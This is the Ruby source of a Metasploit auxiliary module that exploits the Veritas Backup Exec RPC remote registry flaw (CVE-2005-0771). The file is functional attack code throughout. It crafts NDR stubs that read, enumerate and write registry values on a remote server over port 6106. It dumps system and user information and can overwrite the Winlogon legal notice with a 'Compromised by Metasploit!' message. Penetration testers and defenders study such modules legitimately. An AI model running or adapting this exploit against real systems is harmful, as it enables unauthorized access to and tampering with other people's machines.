Path: blob/master/modules/auxiliary/admin/backupexec/registry.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::DCERPC7include Msf::Post::Windows::Registry89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Veritas Backup Exec Server Registry Access',14'Description' => %q{15This modules exploits a remote registry access flaw in the BackupExec Windows16Server RPC service. This vulnerability was discovered by Pedram Amini and is based17on the NDR stub information posted to openrce.org.18Please see the action list for the different attack modes.19},20'Author' => [ 'hdm' ],21'License' => MSF_LICENSE,22'References' => [23[ 'OSVDB', '17627' ],24[ 'CVE', '2005-0771' ],25[ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],26],27'Actions' => [28['System Information', { 'Description' => 'Dump system info (user, owner, OS, CPU...)' }],29['Create Logon Notice', { 'Description' => 'Add a logon notice' }]30],31'DefaultAction' => 'System Information',32'Notes' => {33'Stability' => [CRASH_SAFE],34'SideEffects' => [IOC_IN_LOGS],35'Reliability' => []36}37)38)3940register_options(41[42Opt::RPORT(6106),43OptString.new(44'WARN',45[46false,47'The warning to display for the Logon Notice action',48"Compromised by Metasploit!\r\n"49]50),51]52)53end5455def auxiliary_commands56return {57'regread' => 'Read a registry value'58# "regenum" => "Enumerate registry keys",59}60end6162def run63case action.name64when 'System Information'65system_info66when 'Create Logon Notice'67logon_notice68end69end7071def cmd_regread(*args)72if args.empty?73print_status('Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion')74return75end7677paths = args[0].split('\\')78hive = paths.shift79subval = paths.pop80subkey = paths.join('\\')81data = backupexec_regread(hive, subkey, subval)8283if data84print_status("DATA: #{deunicode(data)}")85else86print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")87end88end8990def cmd_regenum(*args)91if args.empty?92print_status('Usage: regenum HKLM\\\\Software')93return94end9596paths = args[0].split('\\')97hive = paths.shift98subkey = '\\' + paths.join('\\')99data = backupexec_regenum(hive, subkey)100101if data102print_status("DATA: #{deunicode(data)}")103else104print_error("Failed to enumerate #{hive}\\#{subkey}...")105end106end107108def system_info109print_status('Dumping system information...')110111prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'112prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'113prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'114owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'115company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'116cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'117username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'118119print_status("The current interactive user is #{deunicode(username)}")120print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")121print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")122print_status("The system runs on a #{deunicode(cpu)}")123end124125def logon_notice126print_status("Setting the logon warning to #{datastore['WARN'].strip}...")127backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])128backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')129end130131def deunicode(str)132str.gsub("\x00", '').strip133end134135#136# Write a registry key137#138def backupexec_regwrite(hive, subkey, subval, type, data)139stub = backupexec_regrpc_write(140hive: registry_hive_lookup(hive),141subkey: subkey,142subval: subval,143type: type,144data: data145)146resp = backupexec_regrpc_call(5, stub)147return false if resp.empty?148149return true150end151152#153# Read a registry key154#155def backupexec_regread(hive, subkey, subval, type = REG_SZ)156stub = backupexec_regrpc_read(157hive: registry_hive_lookup(hive),158subkey: subkey,159subval: subval,160type: type161)162resp = backupexec_regrpc_call(4, stub)163164return nil if resp.empty?165166ret, len = resp[0, 8].unpack('VV')167return nil if ret == 0168return nil if len == 0169170return resp[8, len]171end172173#174# Enumerate a registry key175#176def backupexec_regenum(hive, subkey)177stub = backupexec_regrpc_enum(178hive: registry_hive_lookup(hive),179subkey: subkey180)181resp = backupexec_regrpc_call(7, stub)182p resp183184return nil if resp.empty?185186ret, len = resp[0, 8].unpack('VV')187return nil if ret == 0188return nil if len == 0189190return resp[8, len]191end192193#194# Call the backupexec registry service195#196def backupexec_regrpc_call(opnum, data = '')197handle = dcerpc_handle(198'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',199'ncacn_ip_tcp', [datastore['RPORT']]200)201202dcerpc_bind(handle)203204dcerpc.call(opnum, data)205outp = ''206207if dcerpc.last_response && dcerpc.last_response.stub_data208outp = dcerpc.last_response.stub_data209end210211disconnect212213outp214end215216# RPC Service 4217def backupexec_regrpc_read(opts = {})218subkey = opts[:subkey] || ''219subval = opts[:subval] || ''220hive = opts[:hive] || HKEY_LOCAL_MACHINE221type = opts[:type] || REG_SZ222223stub =224NDR.UnicodeConformantVaryingString(subkey) +225NDR.UnicodeConformantVaryingString(subval) +226NDR.long(type) +227NDR.long(1024) +228NDR.long(0) +229NDR.long(4) +230NDR.long(4) +231NDR.long(hive)232return stub233end234235# RPC Service 7236def backupexec_regrpc_enum(opts = {})237subkey = opts[:subkey] || ''238hive = opts[:hive] || HKEY_LOCAL_MACHINE239stub =240NDR.UnicodeConformantVaryingString(subkey) +241NDR.long(4096) +242NDR.long(0) +243NDR.long(4) +244NDR.long(4) +245NDR.long(hive)246return stub247end248249# RPC Service 5250def backupexec_regrpc_write(opts = {})251subkey = opts[:subkey] || ''252subval = opts[:subval] || ''253hive = opts[:hive] || HKEY_LOCAL_MACHINE254type = opts[:type] || REG_SZ255data = opts[:data] || ''256257if type == REG_SZ || type == REG_EXPAND_SZ258data = Rex::Text.to_unicode(data + "\x00")259end260261stub =262NDR.UnicodeConformantVaryingString(subkey) +263NDR.UnicodeConformantVaryingString(subval) +264NDR.long(type) +265NDR.long(data.length) +266NDR.long(data.length) +267data +268NDR.align(data) +269NDR.long(4) +270NDR.long(4) +271NDR.long(hive)272return stub273end274end275276277